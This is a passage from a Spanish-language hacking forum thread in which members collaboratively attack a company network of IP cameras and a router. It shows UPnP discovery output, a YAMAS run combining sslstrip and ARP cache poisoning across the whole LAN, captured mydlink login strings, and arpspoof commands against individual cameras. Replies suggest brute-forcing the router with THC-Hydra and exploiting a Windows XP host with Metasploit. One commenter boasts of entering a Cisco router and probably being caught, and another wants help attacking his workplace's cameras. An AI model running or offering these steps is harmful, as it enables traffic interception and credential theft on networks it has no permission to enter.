Entering discovery mode for 'upnp:rootdevice', Ctl+C to stop...

****************************************************************
SSDP reply message from 192.168.1.17:8838
XML file is located at http://192.168.1.17:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.16:8156
XML file is located at http://192.168.1.16:8156/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.20:8838
XML file is located at http://192.168.1.20:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.19:8838
XML file is located at http://192.168.1.19:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.1:2800
XML file is located at http://192.168.1.1:2800/WFADevice.xml
Device is running Unknown/0.0 UPnP/1.0 Conexant-EmWeb/R6_1_0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.15:11993
XML file is located at http://192.168.1.15:11993/description.xml
Device is running Embedded UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.18:8838
XML file is located at http://192.168.1.18:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP notification message from 192.168.1.13:10242
XML file is located at http://192.168.1.13:10242/description.xml
Device is running Embedded UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.14:10242
XML file is located at http://192.168.1.14:10242/description.xml
Device is running Embedded UPnP/1.0
****************************************************************

Después listamos los hosts descubiertos:
Código: [Seleccionar]
upnp> host list

[0] 192.168.1.17:8838
[1] 192.168.1.16:8156
[2] 192.168.1.20:8838
[3] 192.168.1.19:8838
[4] 192.168.1.1:2800
[5] 192.168.1.15:11993
[6] 192.168.1.18:8838
[7] 192.168.1.13:10242
[8] 192.168.1.14:10242

Nos damos cuenta de que son todas las cámaras + el router
-------------- CAPITULO EN CONSTRUCCIÓN --------------------

MITM

Para ejecutar el ataque MITM vamos a utilizar YAMAS, un script que permite automatizar considerablemente el proceso del ataque.

Para el primer ataque vamos a seleccionar como objetivo toda la red y vamos a redirigir el trafíco de los puertos 80 a ver que encontramos.

Código: [Seleccionar]
[email protected]:~# yamas
No update available
Script is installed


                                                               
     `YMM'   `MM'   db      `7MMM.     ,MMF'      db       .M"""bgd
       VMA   ,V    ;MM:       MMMb    dPMM       ;MM:     ,MI    "Y
        VMA ,V    ,V^MM.      M YM   ,M MM      ,V^MM.    `MMb.     
         VMMP    ,M  `MM      M  Mb  M' MM     ,M  `MM      `YMMNq.
          MM     AbmmmqMA     M  YM.P'  MM     AbmmmqMA   .     `MM
          MM    A'     VML    M  `YM'   MM    A'     VML  Mb     dM
        .JMML..AMA.   .AMMA..JML. `'  .JMML..AMA.   .AMMA.P"Ybmmd"
===========================================================================
=       Welcome to Yet Another MITM Automation Script.                    =
=       Use this tool responsibly, and enjoy!                             =
=       Feel free to contribute and distribute this script as you please. =
=       Official thread : http://tinyurl.com/yamas-bt5                    =
=       Check out the help (-h) to see new features and informations      =
=       You are running version 20120213                      =
===========================================================================
Message of the day :
  Reviewing some code...
Could someone send me a complete log file? I'm planning on making a better parsing.
On another note, I today had the privilege to witness that Yamas works against Youporn mobile. MMD.

Please make sure to check out my last project : http://msimdb.comax.fr

 [+] Cleaning iptables
[-] Cleaned.

 [+] Activating IP forwarding...
[-] Activated.

 [+] Configuring iptables...
 To what port should the traffic be redirected to? (default = 8080)

Port 8080 selected as default.

 From what port should the traffic be redirected to? (default = 80)

Port 80 selected as default.


 Traffic from port 80 will be redirected to port 8080
[-] Traffic rerouted

 [+] Activating sslstrip...
Choose filename to output : (default = yamas)
wlan_ed
 Sslstrip will be listening on port 8080 and outputting log in /tmp/wlan_ed.txt

sslstrip 0.9 by Moxie Marlinspike running...

 [-] Sslstrip is running.


 [+] Activating ARP cache poisoning...

Gateway : 192.168.1.1      Interface : wlan0

Enter IP gateway adress or press enter to use 192.168.1.1.

192.168.1.1 selected as default.


What interface would you like to use? It should match IP gateway as shown above. Press enter to use wlan0.

wlan0 selected as default.


We will target the whole network as default. You can discover hosts and enter IP(s) manually by entering D.
Press enter to default.


 Targeting the whole network on 192.168.1.1 on wlan0 with ARPspoof
[-] Arp cache poisoning is launched.  Keep new window(s) running.

 Attack should be running smooth, enjoy.

Aquí está el resultado de este primer ataque:
Código: [Seleccionar]
Website = prov.eu.mydlink.com):
Login = tfQmw7Lw5EAzo1LgDdUkp1vyZCx6XRXyMvi6TA6o7PW5UPCp4Yf5D54cSTQ6xdbpgYT6FsJoqYQdRsXps3Aw88Mm18tsUsMy20T37OboNmy5VdvoavTsWjZ7ro3kF17inCMlV5WggzDjGstwB8gyrw3wRd7mzyY3HTU$
Website = prov.eu.mydlink.com):
Login = Pw2eMpFln89k4cF6Tcpo6m/6ItsmWvNsMpdlSdj5xyGoQyB6yvhoXjzeFzpvs5+6d6HvrAFibT2tHB0$
Website = prov.eu.mydlink.com):
Login = 4cr6n8hci/evlGheWlo7kGHsQKBmA+ssKu1mUJ938VzjTVa83XNjWfPwCZrmvlR8yXlmEkp3zXrtVks8ebec7gn62gVyTkns1Hlo8FR3GqFjRlH3q7NySr2keaw7VVqnn9s4EGlnsIoyCJe8ZSOtWW+zvI2tcSezZZq$
Website = prov.eu.mydlink.com):
Login = QkjpNasdssmsvjsxWj/rbvpxQoFqTmakXyVdY32f3pwrIpqxim0rMcanYolwZsqmTjewmw9odpr3cBayEQz$
Website = prov.eu.mydlink.com):
Login = +en3Kneyp7ht6feaRUwi5f/wHnOoG4mwO9Ro0kF6nbpp9bl5hePpRGNsFrnorU15aeaoSJz6benvDJm5cVhyjFr3YF2c9JrwJxamng16AW9pWU/6tHRlQK+tzSddNbevsfmdQencc4jkEq2iebjlVqqra+wkFqhebbk$
Website = prov.eu.mydlink.com):

-------------- CAPITULO EN CONSTRUCCIÓN --------------------

METASPLOIT
-------------- CAPITULO EN CONSTRUCCIÓN --------------------
Título: Re:Diario de un Ataque
Publicado por: djtux en Junio 21, 2012, 07:50:25 pm
muy buen aporte de hecho muy interesante pero tengo una pregunta habrá alguna manera de correr backtrack desde mac os x????
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 21, 2012, 07:56:42 pm
Sí, la hay. http://bit.ly/LjhPps
De todas formas, si quieres preguntar algo que no tiene nada que ver con mi post, lo mejor es crear un post nuevo.
Título: Re:Diario de un Ataque
Publicado por: kid_goth en Junio 21, 2012, 08:33:33 pm
 ;D ta gueno xD... Saludos
Título: Re:Diario de un Ataque
Publicado por: JAG en Junio 21, 2012, 08:49:04 pm
Que bueno tio... me gusta la labor que estas realizando...  ;)
 
Título: Re:Diario de un Ataque
Publicado por: miyamoto340 en Junio 21, 2012, 08:59:24 pm
Muy buen aporte, esperaré a ver como sigues xD
Título: Re:Diario de un Ataque
Publicado por: ACK en Junio 21, 2012, 09:15:45 pm
Excelente trabajo! Esto se pone interesante muajaja ;D

Saludos familia  ;)
Título: Re:Diario de un Ataque
Publicado por: D16174L_MURD3R en Junio 21, 2012, 09:37:23 pm
Muy interesante el post!, ya hacía tiempo que no entraba al foro.
Saludos!.
Título: Re:Diario de un Ataque
Publicado por: coco en Junio 21, 2012, 09:46:42 pm
buen trabajo esperemos el desenlase saludos.
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 21, 2012, 10:50:15 pm
Bueno brodels, con esto yo creo que podemos dar por concluida la 1ª fase del post. Recordad que el objetivo del post es llevar a cabo un ataque conjunto donde toda la comunidad participe. Ya tenemos un escenario más o menos claro. Hay escaneos de todos los hosts con puertos abiertos, servicios, un mapeado más o menos claro de la red (evidentemente todavía hay que avanzarlo más), hay una lista de todos los comandos que acepta el router por telnet... Tenéis todo lo necesario para dejar de relameros los dientes y empezar a pegar bocados, así que a partir de ahora... SE ABRE LA VEDA!!
Podéis empezar a plantear ideas, posibles ataques, métodos de escaneo y mapeado alternativos... Podéis pedirme que os proporcione otros datos en concreto... LO QUE SEA!!!

Afilad los cuchillos HackXCrack... nos vamos de caza!

PD: Proximamente publicaré un escaneo de vulnerabilidades con metasploit.
Título: Re:Diario de un Ataque
Publicado por: tzspy en Junio 22, 2012, 02:21:21 am
woow que divertido!! que bueno  backtrack
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 22, 2012, 02:26:50 am
Nuevos capitulos:

MULTIDIFUSIÓN UPnP

MIRANDA (En proceso)


Por lo que me estoy encontrando vamos a necesitar a algún experto en XML para seguir avanzando  ;D
Título: Re:Diario de un Ataque
Publicado por: miyamoto340 en Junio 22, 2012, 10:49:13 am
Al estar ya en la red por que no hacer un MITM? Cual es el objetivo del ataque?
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 22, 2012, 11:32:34 am
Al estar ya en la red por que no hacer un MITM? Cual es el objetivo del ataque?

Bien miyamoto! Estaba esperando a que alguien lo propusiera, no quiero que esto sea un simple tuto hecho por mi, la idea es que todos participeis.

A que maquina atacarias con un MITM y en que puertos? El objetivo es hacerse con el control de toda la red, o por lo menos de alguna máquina.
Título: Re:Diario de un Ataque
Publicado por: miyamoto340 en Junio 22, 2012, 11:56:30 am
Al estar ya en la red por que no hacer un MITM? Cual es el objetivo del ataque?

Bien miyamoto! Estaba esperando a que alguien lo propusiera, no quiero que esto sea un simple tuto hecho por mi, la idea es que todos participeis.

A que maquina atacarias con un MITM y en que puertos? El objetivo es hacerse con el control de toda la red, o por lo menos de alguna máquina.

Ok, el único PC es este:192.168.1.34 y el tuyo. Si le hacemos un MITM y observamos los puertos con los que accede a las cámaras,1501-1508 tarde o temprano tendrá que loggearse o si ya lo está podremos sacarle una cookie.
Si tenemos que acceder a la máquina vemos que es un windows XP o similar, no deberia haber problemas en rebentarlo con metasploit.
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 22, 2012, 12:09:05 pm
Al estar ya en la red por que no hacer un MITM? Cual es el objetivo del ataque?

Bien miyamoto! Estaba esperando a que alguien lo propusiera, no quiero que esto sea un simple tuto hecho por mi, la idea es que todos participeis.

A que maquina atacarias con un MITM y en que puertos? El objetivo es hacerse con el control de toda la red, o por lo menos de alguna máquina.

Ok, el único PC es este:192.168.1.34 y el tuyo. Si le hacemos un MITM y observamos los puertos con los que accede a las cámaras,1501-1508 tarde o temprano tendrá que loggearse o si ya lo está podremos sacarle una cookie.
Si tenemos que acceder a la máquina vemos que es un windows XP o similar, no deberia haber problemas en rebentarlo con metasploit.

De acuerdo  ;D
Se abren 2 capitulos más:
 
MITM(En construcción)

METASPLOIT(En construcción)

PD: Estoy de acuerdo en todo lo que has dicho, pero también puede existir la posibilidad de que el PC 192.168.1.34 se trate de un PC de trabajo y nunca acceda a las cámaras. Podría darse el caso de que a las cámaras solo se acceda a través del NAT desde fuera de la red para controlar a los empleados. De cualquier manera la mejor forma de salir de dudas es comprobandolo!
Título: Re:Diario de un Ataque
Publicado por: miyamoto340 en Junio 22, 2012, 12:32:40 pm
Si no se conecta desde dentro, no sería necesario un servidor? Y en ese caso no estaría montado en ese PC?
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 22, 2012, 01:47:28 pm
Mmmm... no se hasta que punto sería necesario un servidor para conectarse a las cámaras... puede que la propia cámara almacene un archivo de configuración con el login y el password y simplemente verifique que són correctos cuando le llega una conexión. Hay una IP dentro de la red que lleva mosqueandome desde que empezamos el ataque, es la 192.168.1.10, ya que el Nmap la detecta como un router, lo cual no me cuadra. Puede que se trate de un servidor.

EDITO: Hace un rato ya que estoy corriendo un ataque MITM con "yamas" y por el momento ha detectado que de vez en cuando desde las cámaras se realiza una conexión a esta dirección prov.eu.mydlink.com, si buscamos esta dirección en google nos encontramos con http://eu.mydlink.com/entrance , donde podemos ver una pestaña de Login y otra de Password. Así que parece que para acceder a las cámaras desde fuera de la LAN la conexión se realiza a través de un servidor externo que no tiene nada que ver con la red. Por el formato del Login podemos deducir que el Login para acceder a las cámaras es un email, así que nuestra prioridad pasa a ser la de capturar un email y su correspondiente password, ya que muy poca gente cambia de de contraseña según la pagina.
Postearé los resultados del MITM al final del día.

EDITO2: Y aquí tenemos un video de como se accede a las cámaras por cortesía de D-Link:
feature=player_embedded#
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 23, 2012, 01:16:01 pm
Vale BlindOwl, voy a intentar averiguar más cosas de esa ip. Gracias por el aporte!

Llevo corriendo un MITM desde ayer por la mañana y todavía no ha pillado nada útil. Voy a seguir con ello un poco más y si no sale nada revisaré que está pasando porque algo no va bien. Sabéis si se pueden correr varios ataques de arpspoof a la vez? En plan:

Ventana 1
Código: [Seleccionar]
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.13
arpspoof -i wlan0 -t 192.168.1.13 192.168.1.1

Ventana 2
Código: [Seleccionar]
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.14
arpspoof -i wlan0 -t 192.168.1.14 192.168.1.1

Ventana 3
Código: [Seleccionar]
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.15
arpspoof -i wlan0 -t 192.168.1.15 192.168.1.1
Título: Re:Diario de un Ataque
Publicado por: Byte Sec en Junio 25, 2012, 08:39:12 pm
Excelente Trabajo, En verdad me has enseñado bastante. Esperare por el desenlace :D.
Título: Re:Diario de un Ataque
Publicado por: coco en Junio 25, 2012, 10:46:49 pm
Seria bueno analisar el trafico  de su red  para conoserlo un poco mas  y talvez usariamos la ingenieria social  otra obccion  , pero si ya estas en la red  porque no entrar en la configuraccion del router por lo general muchos lo dejan la contrasena por defecto  tanto las camaras .
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 26, 2012, 09:35:04 pm
Seria bueno analisar el trafico  de su red  para conoserlo un poco mas  y talvez usariamos la ingenieria social  otra obccion  , pero si ya estas en la red  porque no entrar en la configuraccion del router por lo general muchos lo dejan la contrasena por defecto  tanto las camaras .

Ya hemos entrado en el router, la contraseña por defecto era 1234, hay una captura de pantalla de la interfaz gráfica del router en el post. La ingeniería social en este caso no es una opción ya que la empresa está informada del ataque y lo permite. Ya hemos comprobado de diversas formas que las contraseñas de las cámaras no son las típicas por defecto. Te has leido el post?

En cuanto a lo del análisis de tráfico puedo subir una captura con wireshark para que veáis que es lo que pilla.

PD: Estos días el post está un poco parado porque estoy de viaje, tan pronto como termine volveré a actualizarlo. Salu2!!
Título: Re:Diario de un Ataque
Publicado por: coco en Junio 29, 2012, 07:09:16 pm
Seria bueno analisar el trafico  de su red  para conoserlo un poco mas  y talvez usariamos la ingenieria social  otra obccion  , pero si ya estas en la red  porque no entrar en la configuraccion del router por lo general muchos lo dejan la contrasena por defecto  tanto las camaras .

Ya hemos entrado en el router, la contraseña por defecto era 1234, hay una captura de pantalla de la interfaz gráfica del router en el post. La ingeniería social en este caso no es una opción ya que la empresa está informada del ataque y lo permite. Ya hemos comprobado de diversas formas que las contraseñas de las cámaras no son las típicas por defecto. Te has leido el post?

En cuanto a lo del análisis de tráfico puedo subir una captura con wireshark para que veáis que es lo que pilla.

PD: Estos días el post está un poco parado porque estoy de viaje, tan pronto como termine volveré a actualizarlo. Salu2!!
Tienes razon no mire bien el post , espero publiques lo que capturaste con el wireshark  para hecharle una mirada saludos.
Título: Re:Diario de un Ataque
Publicado por: djtux en Julio 03, 2012, 10:51:51 pm
Muy buen aporte, lo e intentado con dos router diferentes y me a funcionando correctamente además leyendo un poco en los nuevos cuadernillos. Mi a interesado mucho este tema así que gracias por el aporte.
Título: Re:Diario de un Ataque
Publicado por: kid_goth en Julio 04, 2012, 03:51:11 pm
Odeveku voy a ir sacando esto en un PDF y cuando se termine lo publico si no es problema?


:D ta muy gueno jejeje
Título: Re:Diario de un Ataque
Publicado por: odeveku en Julio 04, 2012, 05:28:44 pm
Claro Kid, sin problemas. ;)
Pero mejor esperar a que este terminado no?
Título: Re:Diario de un Ataque
Publicado por: kid_goth en Julio 04, 2012, 05:31:31 pm
Claro Kid, sin problemas. ;)
Pero mejor esperar a que este terminado no?

:D claro pero para ir maquetando desde ya xD que quede bonito jejee
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Julio 04, 2012, 09:12:23 pm
Esta muy bueno este post lo practicare, espero terminarlo pronto, test.
Título: Re:Diario de un Ataque
Publicado por: keyjo2210 en Julio 05, 2012, 05:49:06 pm
Muy buen aporte, esto demuestra que si hay talento muy excecional en esta comunidad, gracias por brindar este conocimiento a todos,

saludos..........
Título: Re:Diario de un Ataque
Publicado por: garses69 en Julio 07, 2012, 10:12:03 pm
hermano me parece un excelente aporte aunque tendria que mencionar que dejamos a la suerte muchos de nuestros procedimientos como ejemplo te menciono el hecho de que nuestro router esta configurado con valores de fabrica, eso seria muy poco probable si lo que estamos haciendo es intentar a una LAN respatable.
para ser honesto no tengo idea de como crakear un router pero creo que la finalidad de este ejercicio es llegar hasta lo mas profundo del tema espero podramos encontrar la respuesta a esta interrogante
SALUDOS!!!
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Julio 08, 2012, 11:38:22 pm
Kid de acuerdo haz el video, para bajar el material y ahora si poderpracticarlo en casa mas trankilo.
Título: Re:Diario de un Ataque
Publicado por: kid_goth en Julio 09, 2012, 12:09:07 am
Kid de acuerdo haz el video, para bajar el material y ahora si poderpracticarlo en casa mas trankilo.

¬¬ video? :D pdf jejejejej ya casi igual odeveku tiene que dar el visto bueno ;)
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Julio 09, 2012, 04:25:45 pm
Ok lo que digas sra marcado en la historia, jejeje.
Título: Re:Diario de un Ataque
Publicado por: YuriGra en Julio 12, 2012, 09:04:25 pm
 :o :o Gracias por el aporte esta bueno ^^
Título: Re:Diario de un Ataque
Publicado por: storm en Julio 18, 2012, 10:09:27 am
Muy buen aporte! Felicidades
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Julio 18, 2012, 04:47:45 pm
Kid de acuerdo haz el video, para bajar el material y ahora si poderpracticarlo en casa mas trankilo.

¬¬ video? :D pdf jejejejej ya casi igual odeveku tiene que dar el visto bueno ;)


Si kid loke tu digas, saludos, voy uy bien en el test, jiji.
Título: Re:Diario de un Ataque
Publicado por: [email protected] en Julio 18, 2012, 07:25:15 pm
Buen post, ya que estamos podriamos intentar meterle mano a alguna de las camaras, por si suena la flauta y podemos aprovechar algunas deficiencias en seguridad del RTSP,  te dejo un aperitivo que podría resultar:


http://www.openloop.com/education/classes/sjsu_engr/engr_networksecurity/spring2009/preso/RTSP.pdf (http://www.openloop.com/education/classes/sjsu_engr/engr_networksecurity/spring2009/preso/RTSP.pdf)


Aparte ese XP que aparece en el resultado del escaneo con Nmap parece tener alguna papeleta que podría dar premio, pero veo que ya lo vas a "tentar" con Metasploit....a la espera de resultados  ;)


Un saludo.
Título: Re:Diario de un Ataque
Publicado por: salamancageek en Julio 30, 2012, 11:16:56 am
Muy buen aporte, deseando verlo todo acabado. Mucho curro

Título: Re:Diario de un Ataque
Publicado por: CrashOveride en Agosto 15, 2012, 05:51:41 pm
Para cuando un nuevo diario? :D
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Agosto 15, 2012, 06:36:41 pm
Relamente no termino todo aun.XD
Título: Re:Diario de un Ataque
Publicado por: CrashOveride en Agosto 15, 2012, 07:04:06 pm
Pues fijate que en mi empresa, hay camaras de vigilancia, tienen una torreo especial para monitorear esas camaras, me agradaria que me ayudases a darle con todo XD
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Agosto 15, 2012, 07:13:36 pm
Jjeeje. tambn en la mia y se obsrvan de modo externo jejjee, lo ke kiero es entra y tapar esos hoyos asi como el manual, XD
Título: Re:Diario de un Ataque
Publicado por: PuntoCiego en Agosto 15, 2012, 07:50:47 pm
Interesante. ya que has mencionado Wireshark podrías sniffar y el resultado, es decir los pcap los podrías visualizar con la tool Xplico, de este modo se tiene algo mucho mas "visual".
Título: Re:Diario de un Ataque
Publicado por: coco en Agosto 16, 2012, 05:45:14 pm
Interesante. ya que has mencionado Wireshark podrías sniffar y el resultado, es decir los pcap los podrías visualizar con la tool Xplico, de este modo se tiene algo mucho mas "visual".
Es buena idea  pero lo que interesa ahorita es tener acceso a esas camaras lo que savemos esas camaras estan conectadas al router  hoy en dia muchos duenos de negocios  usan sus telefonos para monitoriar sus empresas  una cámara IP a un router y por verla de cualquier parte  para esto usaremos  el servidor DYNDNS  vamos a esta pagina
 www.dyndns.org  hasemos nuestra cuenta y ya podremos acceder  a nuestras camaras  que por lo general la ip es
192.168.0.1  muy paresida a la de las camaras  que queremos entrar  el punto es que para esto el dueno o administrador
tuvo que poner una cuenta de correo y una contrasena  para entrar a esa cuenta del servidor DYNDNS .
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Agosto 17, 2012, 05:01:41 pm
Se sirve mucho una cuenta de ese tipo, montare un par con esa cuenta.
Título: Re:Diario de un Ataque
Publicado por: stakewinner00 en Agosto 17, 2012, 05:26:45 pm
Muy interesante.
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Agosto 17, 2012, 05:52:07 pm
Primero a terminar el manual XD. Despues lo demas.
Título: Re:Diario de un Ataque
Publicado por: Jukathaido en Agosto 18, 2012, 10:59:15 pm
Buenas noches....teniendo acceso al router, por que no batir algún puerto del pc e intentar un exploit? Seguramente ese pc pueda tener acceso a las camaras y de esa forma, con un ataque al pc para intentar entrar con metasploit, podamos ver alguna de esas camaras....


Un saludo y espero el desenlace!!!
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Agosto 24, 2012, 12:20:13 am
Almenos yo entre al router cisco aunke kreo ke me pillaron.
Espero no me sigan ya. No es un lugar importante.
BNrte.
Título: Re:Diario de un Ataque
Publicado por: vertigo en Agosto 28, 2012, 04:55:24 pm
Hola gente, acabo de registrarme aunque hace ya un tiempo que conozco el foro.
Realmente, aunque me considere bastante novatillo en el tema, siempre me ha interesado muchísimo, y desde mi autodidactismo (no acostumbro a participar en los foros más que leyendo y nunca he estudiado nada relacionado) avanzo poquito a poquito, pero eficazmente.

Bueno, quería deciros que leyendo el post (muy bueno, por cierto, me gusta el proyecto) He visto el mensaje de este compañero que parece haberse registrado con el único propósito de haceros ver algo muy importante que se ha pasado por alto:

hermano me parece un excelente aporte aunque tendria que mencionar que dejamos a la suerte muchos de nuestros procedimientos como ejemplo te menciono el hecho de que nuestro router esta configurado con valores de fabrica, eso seria muy poco probable si lo que estamos haciendo es intentar a una LAN respatable.
para ser honesto no tengo idea de como crakear un router pero creo que la finalidad de este ejercicio es llegar hasta lo mas profundo del tema espero podramos encontrar la respuesta a esta interrogante
SALUDOS!!!

¿Qué pasaría si el administrador de la red, comprensiblemente desconfiado, hubiese cambiado los valores por defecto del router? A mi entender... no dispondríamos de todos los datos que habéis conseguido recopilar hasta ahora. Realmente, como dice el compañero más arriba, no se me ocurre ninguna otra manera de acceder al router que no sea por fuerza bruta.
Me suena haber investigado el tema.. quizá haga un par de años, creo que hay un programa llamado THC-HYDRA (corregidme si me equivoco, suele pasarme jaja) que facilita este tipo de ataques a routers.

Cita de: http://www.thc.org/thc-hydra/
THC-Hydra. A very fast network logon cracker which support many different services.

Sé que ahora diréis: ¿De qué va este tío? o algo por el estilo, pero yo creo que para que el post estuviese realmente completo, deberíamos intentar abrir el router por nuestros medios y no, como dice el compañero más arriba (de nuevo) dejarlo en manos del azar...
¿qué os parecería volver un poquito atrás?
Título: Re:Diario de un Ataque
Publicado por: odeveku en Agosto 30, 2012, 02:03:46 am
Hola a todos! Lo primero de todo pedir disculpas porque el post ha estado muy parado estos meses... bueno, ya sabeis, es lo que tiene el veranito, mucha playa, mucha paella y poco tajo! En septiembre espero volver a retomarlo y seguir avanzandolo entre todos.

Dicho esto, voy a aclarar algunas cosillas. Este no es un escenario que me haya inventado yo. Tampoco es un escenario que haya preparado yo en mi casa para luego "ponerlo a prueba". Toda la red pertenece a una empresa X que por una serie de circunstancias me da carta blanca para atacarla. Asi que cuando digo que probamos la contraseña por defecto del router, y que conseguimos entrar, no es que yo lo haya "trucado" para que sea así. Es que realmente esta empresa ha mantenido durante todo este tiempo la contraseña por defecto en sus routers, por lo que desgraciadamente tengo que discrepar tanto con vertigo como con garses69 en eso de que es muy poco probable encontrar un router configurado con valores de fábrica, ya que seguramente el 80% de las redes de empresas a las que intentemos entrar tendrar esta brecha de seguridad. Obviamente si intentas entrar en telefonica, telmex o microsoft, es poco probable que te encuentres algo asi, pero las pequeñas y medianas empresas normalmente siguen siendo muy descuidadas con la seguridad de sus redes.

Pero claro, coincido con vosotros en que lo mejor es no depender de ese error humano para poder abrir una brecha de seguridad en el router, asi que si alguien sabe otro método aparte del públicado que postee y se incluirá en el post principal (esto se aplica a todos los pasos). Yo conozco otro mediante el que se pueden cambiar valores del router como la contraseña sin necesidad de introducir ningún password, pero tiene que tener UPnP activado, con el script miranda se puede hacer.

Un saludoooo hackxcrack!
Título: Re:Diario de un Ataque
Publicado por: vertigo en Agosto 30, 2012, 09:46:36 am
Odeveku, espero que no te haya molestado mi comentario xD sólo estaba puntualizando.

Aunque no estoy muy de acuerdo con esta afirmación tuya...
ya que seguramente el 80% de las redes de empresas a las que intentemos entrar tendrar esta brecha de seguridad.
Si una empresa tiene contratado un mantenimiento informático (y esto si es más habitual en pymes, ya que la mayoría de gente no tiene idea de cómo hacerlo) esta es, yo diría, de las primeras cosas que cubren. No lo digo por decir, me he encontrado casos, incluso en routers caseros.

Aclaro que ni mucho menos estoy criticando ni el post ni a los colaboradores de éste. Simplemente pienso que puestos a aprender... ¡vamos a aprender todo lo posible! ¿no? ¿y qué mejor lugar que éste, con un ejemplo práctico abordado entre todos?

P.D. Odeveku. No sé si a los demás también, pero a mí me interesa mucho el método este que comentas del UPnP con miranda. Algo he leído, aunque la verdad, muy por encima... No sé si el router que nos ocupa lo tendrá activado (?) pero ¿podrías dar un poquito más de info sobre éste método?

Gracias y disculpas de nuevo si alguien se ha sentido criticado o algo :S
Título: Re:Diario de un Ataque
Publicado por: x-MaS en Septiembre 01, 2012, 08:11:23 pm
Tio esta wapo este post ^^ estoy deseando de que sigas con el siguiente capitilo! :D
Título: Re:Diario de un Ataque
Publicado por: elASPERO en Septiembre 04, 2012, 06:12:53 am
una pregunta todo esto se aprende con las revistas??
Título: Re:Diario de un Ataque
Publicado por: Hades en Septiembre 04, 2012, 11:00:30 am
te sacastes mas que un 10 carnal, esperando la 2da parte
Título: Re:Diario de un Ataque
Publicado por: hackmundy en Septiembre 05, 2012, 11:13:59 pm
Super info muchas gracias le echare una leida , gracias

Saludos..
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Septiembre 24, 2012, 06:27:36 pm
Muy bueno la verdad el mio es un poco diferente pero es la idea XD.
Título: Re:Diario de un Ataque
Publicado por: Raven en Septiembre 25, 2012, 03:34:10 pm
Un post muy interesante =p.
Título: Re:Diario de un Ataque
Publicado por: SIRIUSBOY en Octubre 26, 2012, 06:22:29 am
excelente post muy bien explicado... :)
 bases solidas de como infiltarse en una red...  8)
Título: Re:Diario de un Ataque
Publicado por: stop_kam en Noviembre 06, 2012, 02:48:39 pm
Buenisimo!!! Celebro un buen aporte!
Título: Re:Diario de un Ataque
Publicado por: muten roshi en Diciembre 05, 2012, 04:48:18 pm
hola amigos
que wena pinta tiene esto
no se acabara el post¿
saludos
Título: Re:Diario de un Ataque
Publicado por: odeveku en Febrero 10, 2013, 08:13:34 pm
Hola de nuevo HxC!
Lamentablemente el post no se va a continuar. La empresa a la que pertenecía la red que estabamos atacando ha cerrado (hay que joderse con la crisis). Asi que nada gente, es una pena pero aquí nos quedamos. Salu2 a to2.
Título: Re:Diario de un Ataque
Publicado por: xplot32 en Febrero 27, 2013, 09:16:01 pm
mis respetos amigo  ;D
Título: Re:Diario de un Ataque
Publicado por: [email protected] en Marzo 11, 2013, 06:15:15 pm
No se podria reemprender el proyecto en un nuevo escenario?
Creo que hablo por todos los lectores del post que nos gustaria una continuacion, aunque sea en otro entorno ya que nos ha dado mucho tema para calentarse la sesera.
Título: Re:Diario de un Ataque
Publicado por: alguacil en Marzo 13, 2013, 05:59:16 pm
Hola buen día, me estoy iniciando en este campo y tengo una duda todo lo que comentas en tu diario se puede hacer en Windows??

Saludos y muchas gracias por su ayuda.

Excelente aporte para todos y más para los que estamos iniciando.
Título: Re:Diario de un Ataque
Publicado por: fran12 en Marzo 22, 2013, 04:05:23 am
Muy pero muy buen post :) espero ansiosamente la segunda fase de tu post.
Título: Re:Diario de un Ataque
Publicado por: marquesdesade en Marzo 30, 2013, 07:01:25 am
hola tengo algunos problemas con airodump, me gustaria que me pudieran ayudar, gracias
Título: Re:Diario de un Ataque
Publicado por: File en Marzo 30, 2013, 07:21:36 am
No se podria reemprender el proyecto en un nuevo escenario?
Creo que hablo por todos los lectores del post que nos gustaria una continuacion, aunque sea en otro entorno ya que nos ha dado mucho tema para calentarse la sesera.

Creo q esta es una muy buena sugerencia... haber si la retoman
Título: Re:Diario de un Ataque
Publicado por: Daniel Martinez en Abril 03, 2013, 06:20:03 pm
Hola buen día, me estoy iniciando en este campo y tengo una duda todo lo que comentas en tu diario se puede hacer en Windows??

Saludos y muchas gracias por su ayuda.

Excelente aporte para todos y más para los que estamos iniciando.

de hecho que si se puede hacer en Windows, incluso se hace mas rápido el trabajo y es mas practico.
Título: Re:Diario de un Ataque
Publicado por: larson32 en Julio 19, 2013, 12:44:54 am
me gustaria una segunda edicion de este post...
muy insuperable la iniciativa
Título: Re:Diario de un Ataque
Publicado por: djduck7 en Agosto 24, 2013, 09:59:59 am
Excelente Post Amigo esty ancioso por ver la segunda parte
Título: Re:Diario de un Ataque
Publicado por: quisqueyano en Agosto 31, 2013, 07:56:43 pm
